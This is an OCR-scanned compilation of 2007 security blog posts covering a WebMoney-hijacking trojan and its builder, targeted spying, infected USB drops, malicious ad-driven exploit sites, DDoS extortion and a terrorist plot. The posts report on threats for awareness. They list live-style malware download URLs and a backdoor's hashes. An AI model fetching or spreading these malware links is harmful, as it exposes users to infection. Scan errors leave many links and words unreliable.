Authentium 4.93.8 04.24.2007 Jno virus found 

Avast 4.7.981.0 04.23.2007 Ino virus found 

AVG 7.5.0.464 04.24.2007 jn found 
BitDefender 7.2 04.25.2007 |no virus found 
CAT-QuickHeal 9,00 04.24.2007 |(Suspicious) - DNAScan 
Clamay devel-20070416 04.25.2007 Jno virus found 

OrWeb 4.33 04.25.2007 |no virus found 

eSafe 7.0.15.0 04.23.2007 Jno virus found 
eTrust-Vet 30.7.3594 04.25.2007 |no virus found 

Ewido 4.0 04.24.2007 |Logger.Webmoner.b2 
FileAdvisor 1 04.25.2007 |no virus found 
Fortinet 2.85.0.0 04.24.2007 |suspicious 

F-Prot 4.3.2.48 04.24.2007 Ino virus found 
F-Secure 6.70.13030.0 04.24.2007 |Trojan-Spy.Win32.Webmoner.bz 
Ikarus 7T3.1.1.5 04.24.2007 |Trojan-Downloader.Win32.Tiny.L 
Kaspersky 4,0.2.24 04.25.2007 |Trojan-Spy.Win32.Webmoner.bz 
Mcafee 5016 04.24.2007 |no virus found 
Microsoft 1.2405 04.24.2007 Ino virus found 
NOD32v2 2216 04.24.2007 Ino virus found 
Norman 5,.80,02 04.24.2007 jno virus found 

Panda 9.0.0.4 04.25.2007 |Suspicious file 

Prevx1 V2 04.25.2007 |no virus found 

Sophos 4.16.0 04.23.2007 |Mal/Packer 

Sunbelt 2.2.907.0 04.19.2007 |VIPRE.Suspicious 
Symantec 10 04.25.2007 |no virus found 
TheHacker 6.1.6.095 04.15.2007 |no virus found 

VBA32 3.11.4 04.23.2007 |no virus found 
VirusBuster 4.3.7:9 04.24.2007 |Packed/FSG 
Webwasher-Gatewa 6.0.1 04.24.2007 |Packer.FSG 


[1]The Webmoner is a malware family that’s been targeting the [2]WebMoney service for the 
[3]last couple of years, a service which is mostly used in Russia from both legitimate and 
malicious parties - three out of five transfers by malicious parties use WebMoney and the 
other two use Yandex. What’s interesting about this trojan, or we can perhaps even define it as 
a module given its 2kb packed size and compatibility with popular malware C &C platforms in 
respect to stats, is that it doesn’t log the accounting details of Web Money customers, instead, 
the attacker is feeding the trojan with up to four of his Web Purses, so that at a later stage 
when the infected party is initiating transfer, the malware will hijack the process and intercept 
the payments and direct them to the attacker’s web money accounts . See how various AVs 
are performing when detecting a sample of it. 


The disturbing part is a recently made public builder, the type of DIY a.k.a the revenge 
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® Builder WM troj 
“WMID 


I voooo00000000 
I oo0000000000 
I Roo0000000000 
z2000000000000 


Options 
IV Packed fsq 2.0 


of the script kiddies with 
a push of a button malware generation with a built in fsg packing to further obfuscate it 
and have it reach the 1.5kb size. See attached screenshot. This attack puts the service 
in a awkward situation, as the transfers are actually hijacked on the fly, and the respon- 
sibility is forwarded to the infected party, compared to a situation where the details have 
been keylogged and transfers made with stolen IDs. How have things evolved from 2001 
until 2007? Keylogging may seem logical but is the worst enemy of efficiency compared 
to techniques that automatically, collect, hijack and intercept the desired accounting data. 
[4]The screen capturing banking trojan Hispasec came across to is a good example pre- 
senting the trade off here. The irony? The author of the builder is anticipating malware on 
demand requests and charging 10 WMZ in virtual money for undetected pieces of the malware . 


There’s an ongoing debate on the usefulness and lack of such of popular anti virus soft- 
ware. In January 2007, the Yankee Group released a 4 pages report starting at $599 - try 
a [5]26 pages free alternative released in January 2006 debunking lots of myths - entitled 
"[6]Anti-Virus is Dead: Long Live Anti-Malware" in an effort to not only generate lazy revenues 
on their insights, but to emphasize on the false feeling of security many AVs provide you 
with. As a consultant you often get the plain simple question on which is the best anti virus 
out there, to which you either reply based on lead generation relationship with vendors, or 
do them a favour and answer the question with a question - the best anti virus in respect 
to what? Detecting rootkits? Removing detected malware and restoring the infected files to 
their previous condition? Log event management compatibility with existing security events 
management software? Fastest response times to major outbreaks? - psst zero day malware 
ruins the effect here. Or which anti virus solution has the largest dataset for detecting known 
malware? Anti virus is just a part of your overal security strategy, and given the anti virus 
market is perhaps the one with the highest liquidity, thus most $ still go to perimeter defense 
solutions, too much expectations and lack of understanding of the threatscape mean customer 
dissatisfaction which shouldn’t always be the case. If anti virus software the way we use it 
today is dead, then John Doe from the U.S or Ivan Ivanov from Russia woud still be 31337-ing 
the world, the Sub7 world | mean. 


Some AVs however perform better than others on given tasks. The recently released 
[7]JAV comparatives speak for themselves. If you’re going to use an anti virus software, use 
one from a company who’s core competency relies in anti virus software, and not from a com- 
pany that entered the space through acquisition during the last couple of years, or from one 
where anti virus is just part of huge solutions portfolio. Boutique anti virus vendors logically 
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outperform the market leaders - exactly the type of advice I’ve been giving out for quite a while. 


Related posts : 

[8]Security Threats to Consider when Doing E-banking 
[9]No Anti-Virus, No E-banking for You 

[10]The Underground Economy’s Supply of Goods 


Previous "virtual shots" : 


[11]Shots from the Malicious Wild West - Sample Six 
[12]Shots from the Malicious Wild West - Sample Five 
[13]Shots from the Malicious Wild West - Sample Four 
[14]Shots from the Malicious Wild West - Sample Three 
[15]Shots from the Malicious Wild West - Sample Two 
[16]Shots from the Malicious Wild West - Sample One 


. http://www.f-secure.com/v-descs/wmpatch.shtm 
. http: //www.webmoney.ru/ 
. http: //www.kaspersky.com/news?id=24 


ttp://ddanchev. blogspot .com/2006//,2009/banking-trojan-defeating-virtual .htm 


iep://wwy, Linuxeocurity con/doce/ealvare- tendo. pad 
_hetp://wiv.marketresearchcon/product/asaplay .asp?productidelA2i77abxe-s 
hep: fnew. av-comparataves. ong 


ttp://ddanchev.blogspot.com/2006/05/no-anti-virus-software-no-e-banking.htm 


10. http://ddanchev. blogspot .com/2007/03/underground-economys- supply-of-goods.htm 


ttp://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_7672.htm 
://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample_20.htm 
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://ddanchev. blogspot .com/2007/04/shots-from-malicious-wild-west-sample.htm 
://ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_3723.htm 
://ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample_10.htm 
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://ddanchev. blogspot .com/2007/03/shots-from-malicious-wild-west-sample.htm 


3.4.15 Outsourcing The Spying on Your Wife (2007-04-26 02:12) 


[1] ™ Targeted attacks and zero day malware have always been rubbing shoulders, and 
it’s not just a fad despite that everyone’s remembering the wide-scale malware outbreaks 
attacking everything and everyone from the last couple of years. But the days of segmenting 
targeted attacks per country, city, WiFi/Bluetooth spot coverage are only emerging. 


The idea of profitably serving a demand for a service however, is promting detective 
agencies to adapt to today’s standards for surveillance and snooping in the form of using 
malware to obtain the necessary information. And despite that commercially [2]obtainable 
surveillance tools are [3]cheaply available to everyone interested and taking the risk of using 
them, customers obviously prefer to leave it to the "pros". Here’s a story of an "adaptive" 
[4]detective agency using targeted emails with malware to spy : 


" The jury of five woman and seven men heard how the agency used "Trojan" computer 
viruses, which were hidden inside emails and attacked computers when opened, allegedly 
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created by American-based IT specialist Marc Caron. Hi-tech devices used to bug phones were 
installed by interception specialist Michael Hall, the court was told. Prosecutors said a number 
of them were fitted to BT’s telegraph polls and inside junction boxes, but BT eventually hid a 
camera in one of the boxes and caught him at work. 


Here’re more [5]details on the targeted attack : 


" Mrs Mellon opened it because it "purported to show what her husband was up to", 
said Ms Moore. It is alleged the agency hacked into emails to snoop on Tamara Mellon. The 
Trojan then recorded "every keystroke that was made", she said, including such things as bank 
account numbers and passwords . "They didn’t take any money. They didn’t steal anything, 
but from time to time they had a little snoop on behalf of their clients," Ms Moore said. " 


| imagine a questionnaire from such a detective agency in the form of the following : 


- The victim’s IT literacy from 0 to 5? 

- Are they aware of the concept of anti virus and a firewall? 

- List us all their contact points in the form of IM and email accounts 
- Are they mobile workers taking advantage of near-office WiFi spots? 


You get the point. Hopefully, such services wouldn’t turn into a commodity, or even if 
they do, I’m sure they’ll somehow figure out a way to legally forward the responsibility to the 
party that initiated the request. 


Related posts: 

[6]HP Spying on Board of Directors’ Phone Records 
[7]HP’s Surveillance Methods 

[8]Mark Hurd on HP’s Surveillance and Disinformation 
[9] 


1 
2. 

3 

4 

5. 
6. 
7. 
8. 
9. 


ttp://ddanchev. blogspot .com/2006/09/hp- spying- on-board-of-directors-phone.htm 


http: //ddanchev. blogspot .com/2006/09/hps-surveillance-methods.htm 
ttp://ddanchev. blogspot .com/2006/10/mark-hurd-on-hps-surveillance-and. htm 
ttp://news.bbc.co.uk/2/hi/uk_news/6591981.stm 
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3.4.16 Malware Infected Removable Media (2007-04-26 02:38) 


In a previous post | discussed various thought to be outdated physical security threats such 
as [1]leaving behind CDs and DVDs malware ready and taking advantage of the auto loading 
feature most people conveniently have turned on by default. Seems like on purposely leaving 
behind pre-infected removable media with the hope that someone will pick them up and act as 
a trojan horse themselves, still remains rather common . Unless your organization has taken 
the necessary removable media precautions, a story on [2]USB sticks with malware should 
raise your awareness on an attacker’s dedication to succeed : 


Malware purveyors deliberately left USB sticks loaded with a Trojan in a London car park ina 
bid to trick users into getting infected. The attack was designed to propagate Trojan banking 
software that swiped users’ login credentials from compromised machines. Check Point 
regional director Nick Lowe mentioned the ruse during a presentation at the Infosec trade 
show on Tuesday, but declined to go into further details, citing the need for confidentiality to 
protect an investigation he’s involved in. " 


From an attacker’s perspective that’s an investment given USB sticks are left in parking 
lots around major banks, and finding a 1GB USB stick laying around would make someone’s 
day for sure. Despite that in this case it’s a banking trojan we’re talking about, on a more 
advanced level, corporate espionage could be the main aim though the [3]exploitation of 
various techniques. 


1. http: //ddanchev. blogspot .com/2006/03/old-physical-security-threats-still.htm 
2. http://www.channelregister.co.uk/2007/04/25/usb_malware/ 
3. http://www.usbhacks.com/category/tools/ 
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3.4.17 Conventional Weaponry VS Cyber Terrorism (2007-04-26 02:54) 


[1]Insightful comment on how assymetric warfare and abusing the most versatile communica- 
tion medium is something conventional weaponry cannot and should not aim to fight : 


" Terrorists use a flat, open network of communications and pass their information mainly 
through the Internet, Lute said as he briefed the group at the Pentagon. These are aspects 
that defy U.S. military capability. “We buy airplanes, ships and tanks and recruit and train 
soldiers to deal with the geographics of a tangible target,” he said. “We can bomb training 
camps, and we can hunt down the enemy, but we can’t bomb the Internet.” By using a nodal 
network to spread their extremist ideologies, Lute said, terrorists are able to easily recruit 
members, acquire weapons, build leaders and receive financial backing. " 


A short excerpt from a [2]previous post : 


" A terrorists’ training camp is considered a military target since it provides them the 
playground to develop their abilities. Sooner or later, it will feel the heat and dissapear from 
the face of the Earth, they know it, but don’t care mainly because they’ve already produced 
and are distributing [3]Spetsnaz type of video training sessions . So abusing information or 
[4]the information medium itself is much more powerful from their perspective then destroying 
their means for communication, spread propaganda, and obviously recruit. " 


Reminds me of a great cartoon where soldiers are in the middle of a network centric 
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warfare situation, all the[5] ™ equiptment on the field is in smoke or doesn’t work, and 
soldiers beg the generals for more "[6]Shock and awe" action and less ELINT attacks. Which, 
of course, doesn’t mean known adversary locations shouldn’t get erased from the face of the 
Earth. Post strike imagery courtesy of FAS, here’s [7]the rest of the collection. 


. bttp://www.emilitary.org/article.php?aid=1067 


ttp://ddanchev.blogspot.com/2007/02/forensic-examination-of-terrorists-hard.htm 


| hep://wwy.spetenaz-gru.con/ 
| http://photost. blogger .con/bloggex/1988/1779/1600/Gyberterrorien.jpd 
| http://photoet blogger .con/blogger?/4090/2257/200/holy. var. jpg 

| http://en. wikipedia. org/vaki/Shock, and_ave 

| http://www, fas.org/ixp/inint/afghen ht 


3.4.18 Malicious Keywords Advertising (2007-04-30 03:20) 


HTTP/1.1 200 OK 

Date: Thu, 26 Apr 2007 21:02:38 GMT 

Server: Apache 

Last-Modified: Mon, 02 Apr 2007 17:05:37 GMT 
ETaq: "ba0191-268-461137e1" 
Accept-Ranges: bytes 

Content-Length: 616 

Content-Type: text/html 


<html> 
<head> 
<title > 
smarttrack.org 
<jtitle> 
<style> 
* { Font-Family: verdana; Font-size: 10pt; COLOR: gray; } 
b { font-weight: bold; } 
table { height: 50%; border: 1px solid gray;} 
td { text-align: center; padding: 25;} 
<istyle> 
</head> 
<body> 
<center> 
<br><br> <br><br> 
<table > 


<tr><td>Welcome to the home of <b>smarttrack.org</b> </td></tr> 
<tr><td>To change this page, upload your website into the public_html directory </td></tr> 
<tr><td><img src="logo. jpg" ></td> </tr> 


Blackhat SEO’s been actively abused by spammers, phishers and malware authors, each 
of them contributing to the efficiency of the underground ecosystem. [1]Comments spam, 
[2]splogs, coming up [3]with ways to [4]get a backlink from a .EDU domain, the arsenal of 
tools to abuse traffic acquisition techniques has a new addition - [5]paid keyword advertising 
directly [6]leading to sites hosting [7]exploit code : 


" Those keywords put the criminals’ sponsored links at the top of the page when searches 
were run for brand name sites like the Better Business Bureau or Cars.com, using phrases 
such as "betterbusinessbureau" or "modern cars airbags required." But when users clicked on 
the ad link, they were momentarily diverted to smarttrack.org, a malicious site that used an 
exploit against the Microsoft Data Access Components (MDAC) function in Windows to plant a 
back door and a "post-logger" on the PC. " 
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Here’s another interesting subdomain that was using JPG images to " break the .exe ex- 
tension ice " and redirect to anything malicious - pagead2.googlesyndication.com.mmhk.cn 


What’s the most cost-effective approach, yet the most effective one as well when it comes to 
that sort of scheme? On a quarterly basis, a "for-the-masses" zero day vulnerability becomes 
reality. The fastest exploitation of the "window of opportunity" until a patch is released and ap- 
plied, is abused by embedding the exploit into high traffic web sites, or even more interesting, 
exploiting a vulnerability in a major Web 2.0 portal to further spread the first zero day. There- 
fore, access to top web properties is a neccessity, and much more cost effective compared 
to using AdSense. | wouldn’t get surprised to find out that hiring a SEO expert to reposition 
the malicious sites is also happening at the time of blogging. Some details at [8]McAfee’s blog. 


Despite the amateurs using purchased keywords as an infection vector, at another mali- 
cious url _ S.gcuj.com we have a decent example of a timely exploitaition with _ s.gcuj.com 
/t.js and _ s.gcuj.com /1.htm using Microsoft’s ANI cursor vulnerability to install online games 
related trojans - _ t.gcuj.com /0.exe _ The series of malicious URLs are mostly advertised or 
directly injected into Chinese web forums, guestbooks etc. Here are some that are still active, 
the majority of AVs thankfully detect them already : 


_ cool.47555.com /xXxxx.exe _ 

_ d.77276.com /0.exe _ 

_ www.pumal163.com /pu/pu.exe _ 
_ rzguanhai.com /server.exe _ 


The key point when it comes to such attackers shouldn’t be the focus on current, but 
rather on emerging trends, and they have to do with anything, but malicious parties continu- 
ing to use AdSense to direct traffic to their sites in the long term. Watch a video related to the 
attacks, courtesy of Exploit Prevention Labs. 


[EMBED] 


http: //ddanchev. blogspot .com/2007/03/spam- comment s-attack-on-techcrunch.htm 
ttp://ddanchev. blogspot .com/2006/11/blogosphere-and-splogs. htm 


ttp://ddanchev. blogspot .com/2006/10/automated-seo-spam-generation.htm 


http: //ddanchev. blogspot .com/2007/01/attack- of -seo-bots-on-edu-domain.htm 


http: //techdirt .com/articles/20070427/030004.shtm 
ttp://www.avertlabs.com/research/blog/=3f p=3d264 
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1. 
2. 
3. 
4. 
5. http://www. forbes.com/security/2007/04/26/google-crime-malware-tech-security-cx_ag 0426google.htm 
6. 
7. 
8. 


ttp://news .com. com/Google+pulls+malicious+sponsored+links/2100-7349_3-6180022.htm1 


3.4.19 Video Demonstration of Vbootkit (2007-04-30 21:07) 
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Orignally introduced at this year’s Blackhat con in Amsterdam, the Vbootkit is a kit showcasing 
the [l]execution of unsigned code on Windows Vista. Recently, the [2]researchers released 
two videos [3]demonstrating the attack worth watching. Here’s the [4Jauthors’ research it- 
self. Answering the mythical question on which is the most secure OS, direct the reply in a 
"which is the most securely configured one" manner, and you'll break through the technology 
solution myopia and hopefully enter the security risk management stage. A secure OS from 
what? Nothing’s unhackable, the [5]unhackable just takes a little while - where the [6]invisible 
[7]incentivising in the [8]desired direction is the shortcut. 


ttp://ddanchev. blogspot .com/2007/03/unsigned-code-execution-in-windows.htm 
ttp://www.nvlabs.in/files/nitin_vipin_vista_vbootkit_poc_RC1_edited_video.avi 


ttp://www.nvlabs.in/files/nitin_vipin_vista_vbootkit_poc_RC2_video.avi 


ttp://www.nvlabs.in/files/vbootkit_nitin_vipin_whitepaper . pdf 


ttp://www.pcworld.com/article/id, 131145-pg, 1/article.htm 


ttp://ddanchev.blogspot.com/2005/12/0bay-how-realistic-is-market-for.html 


. http://ddanchev. blogspot .com/2006/05/shaping-market-for-security.html 
. http: //ddanchev.blogspot.com/2006/05/delaying-yesterdays-Oday-security.htm 


1 
2 
3 
4 
5. 
6 
7 
8 
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3.4.20 Cryptome Under Fire (2007-04-30 21:26) 


Image 6 : NCW Attack Formation 


John Young at [1]Cryptome.org is reporting that its [2]hosting provider decided to terminate 
their relationship on the basis of violating their Acceptable Use Policy : 


"This notice of termination is surprising for Verio has been consistently supportive of 
freedom of information against those who wish to suppress it. Since 1999 Cryptome has 
received a number of e-mailed notices from Verio’s legal department in response to complaints 
from a variety of parties, ranging from British intelligence to alleged copyright holders to 
persons angry that their vices have been exposed (see below). In every case Verio has 
heretofore accepted Cryptome’s explanation for publishing material, and in some cases 
removal of the material, and service has continued. In this latest instance there was no notice 
received from Verio describing the violation of acceptable use to justify termination of service 
prior to receipt of the certified letter, thus no opportunity to understand or respond to the 
basis for termination. 


Guess who'll be the first echo-cursing in an unnamed CavePlex? That'll be Osama Bin 
Laden feeling sorry for not making copies of key documents on how the U.S Coast Guard is 
vulnerable to [3]TEMPEST attacks. Cutting out the sarcasm, Cryptome is an [4JOSINT heaven, 
no doubt about it, but it’s also an initiative debunking the entire concept that secrecy actually 
results in improved and sustained security on an international level. 
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The data collected at Cryptome would never be destroyed, mainly because it’s all digi- 
tal, it’s all distributable, and it simply wants to be free. Thought of the day - The man who 
brought fire to the world got burned at the stake . 


1. http://cryptome.org/cryptome-shut .htm 
2. http://yro.slashdot.org/article.p1l?sid=07/04/29/134232 
3. http://en.wikipedia. org/wiki/TEMPES 


4. http://ddanchev. blogspot . com/2006/09/benef its- of-open-source-intelligence. htm 
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3.5.1 The Brandjacking Index (2007-05-02 02:35) 
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Picture a situation where a customer gets tricked into authenticating at the wrong site of 
company XXX. Would they do business with company XXX after they get scammed, trojan-ized, 
and spammed to (virtual) death? | doubt so, and as we can also see in the results of a recently 
released survey on [1]whether or not customers would do business with retailers who exposed 
personal data - they’d rather dump them right away. 


MarkMonitor just released their first [2]quarterly Brandjacking Index : 


"The Brandjacking Index investigates trends, including drilled-down analysis of how the 
most popular brands are abused online and the industries in which abuse is causing the 
most damage. The report examines the ever-adaptive tactics of brandjackers such as cyber- 
squatting, false association, pay-per-click (PPC) fraud, domain kiting, objectionable content, 
unauthorized sales channels and phishing. The Brandjacking Index tracks the top 25 brands 
from the 2006 Top 100 Interbrand study plus additional Interbrand ranked companies for 
business segment analysis. " 


The old marketing rule that a dissatisfied customer will share the bad experience with 
at least five more fully applies here, and given he or she’s an opinion leader in their circle - 
you've got a problem as it’s your brand in the domain name. Therefore, despite the companies 
[3]developing a market segment for timely and reliably [4]shutting down phishing sites, the 
most obvious "cybersquatted" domains shouldn’t even be allowed to get registered at the 
first place. But given the flexibility of registering a domain these days, from a company’s 
perspective, cybersquatting’s an uncontrollable external factor, and in order to protect their 
future flow of "soft dollars" efforts to monitor the domain space are highly advisable. 


There’re several key techniques you should keep in mind. Cybersquatting, vulnerabili- 
ties within the browser to spoof the status bar and make it look like the legitimate page, 
or a malware infected PC that’s basically redirecting all the known E-banking sites to fake 
ones. [5]No anti virus, no Ebanking is highly advisable, yet not a solution to the problem, and 
E-banking site’s compatibility with the most popular - and targeted - Internet Explorer browser 
ONLY, turn many precautions into a futile attempt to deal with the problem - [6]heading in 
the opposite direction. The question is, which technique is more effective at the end user’s 
perspective, and how should the targeted organizations deal with this indirect form of attack 
on their brands, reputation and the rest of the "soft dollars" goodies such as favorable PR 
and stakeholder’s comfortability? From another perspective, who’s more irresponsible, the 
unaware end user, or banks whose [7]web application security ignorance make it easier for 
phishers to establish trust? 


One solution to the problem is shortening the lifetime of such a domain to the minimum 
by tracking and shutting them down by using a commercial service like this [8]Jonline trade- 
mark monitor, a screenshot of which you can see at the top of the post. Perhaps rather 
resources-consuming, but [9]educating your customers for their own safety in times when 
anyone can register a pay-pal-login.tld domain like through third-party registers, [10]is another 
way [11]to go. Did | mention that [12]anti-phishing toolbars are a free alternative in case 
common sense fails - like it does? 


1. http: //www.securityfocus.com/brief/481 
2. http: //www.markmonitor.com/news/press-070430.htm 


3. http: //ddanchev. blogspot .com/2007/03/take-this-malicious-site-down.htm 
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ttp://ddanchev. blogspot .com/2007/04/taking-down-phishing-sites-business.htm 


ttp://ddanchev.blogspot.com/2006/05/no-anti-virus-software-no- e-banking. htm 


ttp://ddanchev. blogspot. com/2006/04/heading- in-opposite-direction. htm 
ttp://ddanchev. blogspot .com/2007/02/xss-vulnerabilities-in-e-banking-sites.htm 
. http: //ddanchev. blogspot .com/2006/09/interesting-anti-phishing-projects.htm 
10. 
11. 


12. http://ddanchev. blogspot .com/2006/03/anti-phishing-toolbars-can-you-trust.htm 


0 Oo oS 


3.5.2 Anti-Censorship Lifestyle (2007-05-02 22:06) 


[1] * Following a previous post on [2]security lifestyle(s), and in between the ongoing efforts 
to [3]censor a 16 digit number | feel it’s about time you [4]dress yourself properly in case 
you haven't [5]done so already. Censorship in a Web 2.0 world is futile, the way [6]security 
through obscurity is. Seems as [7]everyone’s talking about the number today, there’s even a 
[8]domain name registered with it. 


ttp://images.cafepress.com/product/129059439v3_240x240_Front_Color-Black. jpg 


. http: //ddanchev.blogspot.com/2007/01/security-lifestyles.htm 


ttp://digg.com/tech_news/Digg This_09_f9_11_02_9d_74_e3_5b_d8_41_56_c5_63_56_88_c0_4 


. http: //www.cafepress.com/09f911029d74e3 
. http://www. jinx.com/ 


ttp://en.wikipedia.org/wiki/Security_through_obscurit 


. http://www.flickr.com/photos/xeni/481544025/ 


ONAN ARWNE 


ttp://09-f£9-11-02-9d-74-e3-5b-d8-41-56-c5-63.com/ 
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3.5.3 Winamp PoC Backdoor and a Zero Day (2007-05-04 04:53) 
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Listen to your infection? Not necessarily as this backdoor binds cmd.exe on port 24501, but 
needs to be [1]socially engineered in the form of a plugin for Winamp. Code originally released 
in December, 2006, see attached screenshot. Not much of a fun [2]here either, but as the 
folks at [3]SANS point out Winamp doesn’t play .MP4 files automatically from a web page, so 
no chance to have it embedded within popular sites and cause mass outbreaks as we saw it 
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happen with the with [4]ANI exploit [5]code and the [6]WMF one. 


gen _wbkdr.dll 


File size : 45056 bytes 


MDS5: 74d149f4a1f210ea41956af6ecedb96b 


SHA1 : 5a2e8d5727250a647ce44d00cf7446775e6cd7d5 


. http: //ddanchev. blogspot .com/2007/01/social-engineering-and-malware.htm 


ttp://milwOrm.com/exploits/382 


ttp://isc.sans.org/diary.html?storyid=2729 


1 

2. 

3. . i 
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5. : 

6. P 


http: //www.websense.com/securitylabs/blog/blog. php?BlogID=120 
http://www. infoworld.com/article/06/01/30/74902_HNhackersamd_1.html 
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3.5.4 A Chronology of a Bomb Plot (2007-05-04 05:17) 
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Avery [1]detailed overview of a bomb plot, especially the lines related to anything digital such 
as: 


An e-mail sent from Mr. Khawaja to Mr. Khyam on Nov. 30, 2003, read: "It’s not as easy 
as we thought it would be. We have to design the whole thing ourselves. "There are two 
parts to it, one transmitter and another receiver that will be at a distance of about 1 or 2km 
that will be attached to the wires and send out 5 volts down the line and then we get fireworks. " 


No details on [2]whether or not the communication was encrypted, how it was decrypted - 
indirectly through client side attacks for sure - and was their communication on purposely 
intercepted or filtered though the noise with keywords such as transmitter, wires and fireworks. 


- "Mr. Mahmood was working for the British gas company, Transco, and had stolen sen- 
sitive CD-ROMs from National Grid , a British utility, that detailed the layout of hundreds of 
kilometres of high-pressure gas pipelines in southeast England. " 


And [3]the insider threat was just an overhyped threat with lack of statistical evidence 
of it happenning. Think twice. Don’t dedicate efforts in ensuring such information never 
makes it out of the organization due to terrorist fears only, but consider the consequences of 
it getting into the wrong hands at the first place. 


A notebook in the living room included references for books including The Virtue of Jihad, and 
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Declaration of War. 


Propaganda writings are easily obtainable online, which reminds me that monitoring them to 
the very last mile is worth the risk in order to further expand their network, of both, [4]sites 
they visit and people they communicate with. 


Downloaded on to his laptop was a computer file, [5]The Mujahideen Explosive Handbook. It 
contained the exact recipe to build an ammonium nitrate bomb. " 


On purposely placed online DIY manuals can act as honeypots themselves. As we’ve al- 
ready seen, counter-terrorism forces across the world are establishing such [6]fake cyber 
jihad communities in order to lure and monitor wannabe jihadists. But monitoring who’s 
obtaining the already hosted in the wild manuals, is far more beneficial than hoping someone 
will eventually fall a victim into your cyber trap. 


In another related research by the RAND Corporation entitled "[7]Exploring Terrorist Tar- 
geting Preferences" the authors try to come up with various scenarios on the process of 
prioritizing possible targets such as : 


the coercion hypothesis ; the damage hypothesis ; the rally hypothesis ; and the franchise 
hypothesis . If Al-Qaeda directs the next attack the coercion and damage hypothesis, and, 
quite possibly both, are the most likely to influence the nature of the target. 


Great psychological imagination applied in the paper, worth the read. From a statistical 
point of view, the probability of death due to a car accident is higher than that of a terrorist 
attack, so consider escaping the FUD related to terrorism that’s streaming from your favorite 
TV channels in order to remain objective. The ugliest part of them all is that everyone’s 
discussing the post-event actions taken, and no one is paying any attenting to the pre-event 
activities that made it possible, and with training camps under heavy fire, [8]the digitalization 
of terrorist training is taking place. 


And here’s another great analysis, this time covering the process of [9]how terrorists 
send money by combining anonymous Internet services in between mobile banking : 


"Advanced mobile technology, cooperation between international mobile communica- 
tions providers and international financial institutions and the lack of regulations make for 
a swift, cheap, mostly untraceable money transfer - known as "m-payments" - anywhere, 
anytime, by anyone with a mobile telephone. 


Dare we say adaptive? 


1. http: //www.canada.com/ottawacitizen/news/story .htm1?id=84af78eb-e854-4abf -b6b6-683c4f6a799e 


2. http: //ddanchev. blogspot .com/2007/04/mujahideen-secrets-encryption-tool.htm 
3. http: //ddanchev. blogspot .com/2005/12/insiders-insights-trends-and-possible.htm 
4. http: //ddanchev. blogspot .com/2007/02/forensic- examination-of-terrorists-hard.htm 


5. http: //www.washingtonpost.com/wp-dyn/content/graphic/2005/08/05/GR2005080501177 .htm 
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6. : 
7. http://www.rand. org/pubs/monographs/MG48 

8. http: //ddanchev. blogspot .com/2007/04/conventional-weaponry-vs-cyber .htm 
9. http: //www.spacewar.com/reports/How_Terrorists_Send_Money_999.htm 


ttp://ddanchev.blogspot.com/2007/03/cyber-traps-for-wannabe- jihadists .htm 


3.5.5 DDoS on Demand VS DDoS Extortion (2007-05-08 15:40) 


BA RA BA 


There were [1]recent speculations on the decline of DDoS attacks, in respect to the lack of 
companies actually paying to extortion attacks and that it’s supposedly not a cost effective 
approach for malicious attackers to use their botnets. Think again, as it’s always a matter of 
a vendor’s sensor network diversity, one that’s also excluding targeting mom-and-pop web 
properties. Just because DDoS extortion may not be working, and | say may not be working 
because only a few companies would admit they have paid money given the simple math of 
losing revenues on an hourly basis and spending more on bandwidth and security consultancy 
than the money requested, DDoS on demand still remains a well developed underground 
business model. DDoS attacks may not be profitable for the attacker directly performing them, 
but remain profitable if he’s getting paid to provide the service only . Here’s an excerpt from 
my [2]Future Trends of Malware (January, 2006) publication related to DDoS extortion : 


" Now you should ask yourself, would total cost of ownership of the business, the costs 
of the bandwidth, the DDoS attack protection solution, or the botmaster’s deal with the devil 
style proposition can solve the situation. If you’re thinking big, each and every time an 
organization pays, it not only risks a repeated demand, but is also fueling the growth of the 
practice in itself - so don’t do it! " 


I’m aware of an ironic situation where a small-biz client’s web server started getting 
DDoS without any reason whatsoever. The first thing that came to my mind was that it’s 
either a DDoS extortion, or a possible rival, so | asked whether or not they’ve received any 
extortion emails. They declined, and here comes the interesting part, two days later, the 
attacks stopped, and a letter arrived in the form of the following email - "We saw you ignored 
our first email so we had to demonstrate you the power of our attack, this is your second 
chance to bla bla bla". What happened, and why did they say no extortion emails were sent? 
Here comes the irony, in the spam folder of the publicly obtainable email account for the 
domain was the original extortion email, that got detected as a spam. Time for some [3]cyber 
intelligence to assess their capacity.. Never comply with such letters, or they’ll come back for 
more. By the way, ever thought of the DDoS extortion bluff? 


Here’s another excerpt on DDoS on demand : 


There’s a lot of demand for paying to teens to shut down your competitors and hoping they 
would go under the radar, and while ethics are excluded, given these get busted, they'll 
be the first to forward the responsibility to the buyer of the service. There’s also a clear 
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indication of market for such services, and sooner or later these individuals will improve 
their communication skills, thereby increasing the impact of these attacks. For instance, Jay 
Echouafni, CEO of TV retailer Orbit Communications, paid a group of botmasters to DDoS his 
competitors, where the outage costs were estimated at $2 million. Another case of DDoS on 
demand occurred in March, 2005, when the FBI arrested a 17 year old and a Michigan man 
for orchestrating a DdoS attack, again causing direct monetary loses. DDoS attacks, and the 
ease of gaining capability in this field are clearly increasing. " 


Unethical competitions would favor a service where a third party maintains the infras- 
tructure, launches the attack, and for the safety of both parties, remain as anonymous as 
possible. Here’ [4]a related article at BBC News: 


"We are seeing a lot of anti-competitive behaviour," he said. Mr Sop added that many 
more Asian targets were being hit by DDoS attacks - a region in which Symantec did not 
historically have a big presence. In Asia, he said, DDoS attacks were proving very popular with 
unscrupulous firms keen to get ahead of their rivals. "The really frightening thing is you can 
buy access to a botnet for a small amount of money and you can have you competitor down 
for a long time," he said." 


| never actually enjoyed articles emphasizing on how Russian script kiddies are taking over the 
world given the idea of "outsourcing malicious services". So next time you see a DDoS attack 
coming from the Russian IP space against U.S companies, it could still be U.S based rivals that 
requested the attack on their U.S based competitors - stereotypes keep you in the twilight zone. 


Meanwhile, here’s a proof [5]hacktivism is still alive and fully operational as the Esto- 
nian Internet infrastructure’s been recently under permanent DDoS attacks due to real-life 
tensions of removing a statue from the Soviet era. It wasn’t Chinese Mao-ists that did it for 
sure, but the recent case is another proof that it’s always about the money, as everyone not 
aware of different malicious attackers’ motives is preaching. DDoS extortion isn’t dead, it’s 
just happening beneath the radar, as targets are picked up more appropriately balanced with 
less greed regarding this underground business model only. 


